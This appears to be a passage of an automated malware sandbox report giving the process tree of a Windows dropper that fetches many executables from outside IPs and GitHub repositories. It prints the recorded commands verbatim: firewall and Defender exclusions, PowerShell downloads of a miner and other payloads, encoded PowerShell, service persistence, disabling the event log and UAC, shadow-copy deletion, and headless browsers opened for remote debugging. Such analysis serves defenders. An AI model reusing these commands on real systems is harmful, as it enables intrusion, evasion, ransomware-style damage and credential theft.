      C:\Users\Admin\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2924
    - - C:\Users\Admin\AppData\Local\Temp\868529697.exe
        
        C:\Users\Admin\AppData\Local\Temp\868529697.exe
        5⤵
        
        PID:7084
    - - C:\Users\Admin\AppData\Local\Temp\3075519013.exe
        
        C:\Users\Admin\AppData\Local\Temp\3075519013.exe
        5⤵
        
        PID:7672
- C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\svchost.exe
    "C:\Windows\svchost.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3388
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2016
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 1444
      4⤵
      PID:4704
- C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\sysnldcvmr.exe
    C:\Windows\sysnldcvmr.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4140
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Windows\WindowsServices.exe
    "C:\Windows\WindowsServices.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2448
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2576
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesLisan7random.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 864
    3⤵
    - Program crash
    PID:5060
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.75filesz1nk0vrandom.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1104
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:2020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:7888
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66mindelnew.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3168
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    - System Location Discovery: System Language Discovery
    PID:3180
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      PID:4508
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4520
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      Kills process with taskkill
      PID:2276
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:740
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:1400
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:4948
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmin.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:752
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpla"
    3⤵
    - Launches sc.exe
    PID:696
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpla" binpath= "C:\ProgramData\WinUpla\winuspdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2132
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4888
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpla"
    3⤵
    - Launches sc.exe
    PID:560
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4108
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" ""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4280
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "winsrvcs" & exit
      4⤵
      PID:712
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "winsrvcs"
        5⤵
        
        PID:3840
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66minedelll.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\system32\sc.exe
      sc delete "WinUpdt"
      4⤵
      Launches sc.exe
      PID:788
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
      4⤵
      PID:1824
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del1.exe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4988
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\system32\sc.exe
      sc delete "Windows Services"
      4⤵
      Launches sc.exe
      PID:1560
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
      4⤵
      PID:2696
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
    3⤵
    PID:2236
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
    3⤵
    PID:7772
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5884
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del2.exe.exe"
  2⤵
  PID:3208
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc delete "WinSvcs" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSvcs" /f
    3⤵
    PID:8
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe"
  2⤵
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe"
  2⤵
  PID:5112
- - \??\c:\Windows\system32\wbem\wmic.exe
    c:\KteJTi\KteJ\..\..\Windows\KteJ\KteJ\..\..\system32\KteJ\KteJ\..\..\wbem\KteJ\KteJT\..\..\wmic.exe shadowcopy delete
    3⤵
    PID:5656
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3168
- - \??\c:\Windows\system32\wbem\wmic.exe
    c:\bGxzQX\bGxz\..\..\Windows\bGxz\bGxz\..\..\system32\bGxz\bGxz\..\..\wbem\bGxz\bGxzQ\..\..\wmic.exe shadowcopy delete
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:692
  - - C:\Windows\SysWOW64\PING.EXE
      ping 1.1.1.1 -n 1 -w 3000
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:7020
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe"
  2⤵
  PID:3828
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
    3⤵
    PID:1988
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1376
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1376" "1948" "1876" "1952" "0" "0" "1956" "0" "0" "0" "0" "0"
        5⤵
        
        PID:4656
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
    3⤵
    PID:7908
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://github.com/Lean789/rueht/blob/main/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4576
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe"
  2⤵
  PID:1560
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe"
  2⤵
  PID:4012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    PID:1708
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    PID:1624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      Kills process with taskkill
      PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:1428
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:2264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:6068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:2172
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:5772
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    PID:2720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:1304
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsA.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsA.exe.exe"
  2⤵
  PID:3236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBBAC4AZQB4AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBBAC4AZQB4AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQAuAGUAeABlAA==
    3⤵
    PID:6220
- - C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe
    "C:\Users\Admin\AppData\Local\Temp\LIBAdmin.exe"
    3⤵
    PID:7004
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:5404
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2180
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:6248
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66xmrminer.exe.exe"
  2⤵
  PID:3196
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:6332
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WinUpdt" binpath= "C:\ProgramData\WinUpdt\wincsupdt.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:6352
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:7112
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WinUpdt"
    3⤵
    - Launches sc.exe
    PID:6840
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe"
  2⤵
  PID:5708
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe"
  2⤵
  PID:6504
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe"
  2⤵
  PID:5532
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe"
  2⤵
  PID:6284
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsB.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsB.exe.exe"
  2⤵
  PID:5592
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBCAC4AZQB4AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAaAB0AHQAcAAxADYAMgAuADIAMwAwAC4ANAA4AC4AMQA4ADkAdQBwAGwAbwBhAGQAcwBCAC4AZQB4AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAbwB1AG4AdAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABDAG8AdQBuAHQALgBlAHgAZQA=
    3⤵
    PID:8128
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe"
  2⤵
  PID:7972
- C:\Users\Admin\AppData\Local\Temp\http77.105.161.58files1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.105.161.58files1.exe.exe"
  2⤵
  PID:7988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:8056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:7840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:8004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:7676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:7688
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsWinZip.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsWinZip.exe.exe"
  2⤵
  PID:2552
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe"
  2⤵
  PID:7012
- - C:\Users\Admin\AppData\Local\Temp\tmp431.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp431.tmp.exe"
    3⤵
    PID:2524
- C:\Users\Admin\AppData\Local\Temp\http85.209.128.206DownloadsVirtualPR.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http85.209.128.206DownloadsVirtualPR.exe.exe"
  2⤵
  PID:6948
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ea4dvomf\ea4dvomf.cmdline"
    3⤵
    PID:708
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES616F.tmp" "c:\Users\Admin\AppData\Local\Temp\ea4dvomf\CSC382C0496FE5042D3BA5E77D2F27048FD.TMP"
      4⤵
      PID:4620
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eoreefp2\eoreefp2.cmdline"
    3⤵
    PID:7484
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES833F.tmp" "c:\Users\Admin\AppData\Local\Temp\eoreefp2\CSC4473D8AE493F4F5B9EFEECC831E7.TMP"
      4⤵
      PID:2156
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1616
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5160
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6972
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
      4⤵
      PID:6780
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6236
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ff9632546f8,0x7ff963254708,0x7ff963254718
        5⤵
        
        PID:2864
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7764
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
